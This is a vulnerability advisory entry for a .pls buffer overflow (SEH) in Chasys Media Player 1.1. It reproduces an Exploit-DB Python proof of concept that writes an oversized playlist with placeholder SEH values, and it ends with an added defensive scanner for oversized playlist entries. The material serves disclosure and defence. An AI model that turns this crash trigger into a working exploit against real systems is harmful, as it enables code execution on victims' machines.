Vendor: Chasys Media Player
By: zAx
CVSS: 7.8 (HIGH)
CWE: 119 (Buffer Overflow)
Product Name: Chasys Media Player
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: NO
Related CWE: N/A
CPE: a:jpcha2:chasys_media_player
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

Chasys Media Player 1.1 (.pls) Local Buffer Overflow (SEH) PoC

Chasys Media Player 1.1 is vulnerable to a local buffer overflow when a specially crafted .pls file is opened. This could allow an attacker to execute arbitrary code on the vulnerable system.

Mitigation:

No known mitigation or remediation is available for this vulnerability.
Source

Exploit-DB raw data:

#!/usr/bin/python
# Chasys Media Player 1.1 (.pls) Local Buffer Overflow (SEH) PoC
# SEH and NEXT_SEH are overwritten but the shellcode doesn't execute!!!
# I have tried a lot of addresses.
# Waiting for the exploit from someone.
# Download : http://www.jpcha2.com/setup/chasys_media_player.zip
print "  Chasys Media Player 1.1 (.pls) Local Buffer Overflow (SEH) PoC"
print "  Discovered By : zAx"
print "  Contact : ThE-zAx@Hotmail.Com"
header = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0A\x4E\x75\x6D\x62\x65\x72\x4F\x66\x45\x6E\x74\x72\x69\x65\x73\x3D\x31\x0A\x46\x69\x6C\x65\x31\x3D"
junk = "\x41"*2024
next_seh = "\x42"*4
seh = "\x43"*4
other_data = "\xCC"*800
ex = header + junk + next_seh + seh + other_data
file=open("zAx.pls","w")
file.write(ex)
file.close()

# milw0rm.com [2009-03-18]
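
A defensive check for the condition described above, added here as an example and not part of the original PoC or the vendor's code: it parses a .pls file and flags any entry whose value is longer than a file path should be. The 260-byte limit (Windows MAX_PATH), the name scan_pls and both sample playlists are assumptions constructed for illustration.

```python
"""Flag .pls playlist entries that are too long to be a real path."""
import sys

# Assumption: 260 bytes (Windows MAX_PATH) is the longest sane local entry.
# Stream URLs can be longer; raise the limit if your playlists carry them.
MAX_ENTRY_LEN = 260


def scan_pls(data, max_len=MAX_ENTRY_LEN):
    """Return (line_number, key, reason) tuples for suspicious lines."""
    findings = []
    lines = data.replace(b"\r\n", b"\n").split(b"\n")
    if lines[0].strip().lower() != b"[playlist]":
        findings.append((1, "", "missing [playlist] header"))
    for lineno, line in enumerate(lines, start=1):
        key, sep, value = line.partition(b"=")
        if not sep:
            # Not key=value: a section header, a blank line, or junk.
            if len(line) > max_len:
                findings.append(
                    (lineno, "", "%d-byte line without '='" % len(line)))
            continue
        name = key.strip().decode("ascii", "replace")
        if len(value) > max_len:
            findings.append(
                (lineno, name,
                 "value is %d bytes, limit %d" % (len(value), max_len)))
        if any(b < 0x20 and b != 0x09 for b in value):
            findings.append((lineno, name, "control bytes in value"))
    return findings


# Constructed samples (not taken from a real system).
BENIGN = (b"[playlist]\r\nNumberOfEntries=1\r\n"
          b"File1=C:\\Music\\track01.mp3\r\nTitle1=Track 01\r\n"
          b"Length1=215\r\nVersion=2\r\n")
OVERSIZED = b"[playlist]\nNumberOfEntries=1\nFile1=" + b"A" * 3000

if __name__ == "__main__":
    # With file arguments, scan those; otherwise scan the built-in samples.
    blobs = [(p, open(p, "rb").read()) for p in sys.argv[1:]] or [
        ("BENIGN", BENIGN), ("OVERSIZED", OVERSIZED)]
    for label, blob in blobs:
        for lineno, name, reason in scan_pls(blob):
            print("%s:%d: %s %s" % (label, lineno, name, reason))
```

Run it over a download or mail-attachment directory before playlists reach the player; a finding means the file should be quarantined for review, not opened.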